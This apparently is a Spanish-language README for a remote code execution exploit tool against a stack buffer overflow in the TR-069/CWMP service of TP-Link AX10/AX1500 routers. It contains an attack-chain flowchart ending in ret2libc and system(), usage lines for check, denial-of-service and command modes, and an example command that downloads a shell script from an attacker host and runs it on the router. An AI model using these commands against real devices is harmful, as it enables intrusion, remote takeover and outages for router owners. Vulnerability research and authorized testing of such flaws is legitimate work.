
TP-Link AX10/AX1500 CWMP Desbordamiento de búfer RCE
Desbordamiento de búfer basado en pila en CWMP (TR-069) que conduce a la ejecución remota de código.
| Campo | Valor |
|---|---|
| Producto | TP-Link AX10, AX1500 |
| Afectados | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (Alta) |
| Tipo | Desbordamiento de búfer de pila |
| Vector | CWMP/TR-069 (puerto 7547) |
| Impacto | Ejecución remota de código |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
La vulnerabilidad está en el proceso cwmp al manejar solicitudes SOAP SetParameterValues. La entrada se utiliza para calcular el tamaño del búfer sin comprobar los límites.
Explotación:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
Ninguno (usa la biblioteca estándar)
Solo para pruebas de seguridad autorizadas.
| Opción | Descripción | Por defecto |
|---|
-p, --port | Puerto CWMP | 7547 |
-c, --command | Comando para RCE | none |
-t, --timeout | Tiempo de espera del socket | 10 |
--dos | Solo modo DoS | off |
--check-only | Comprobar si es vulnerable | off |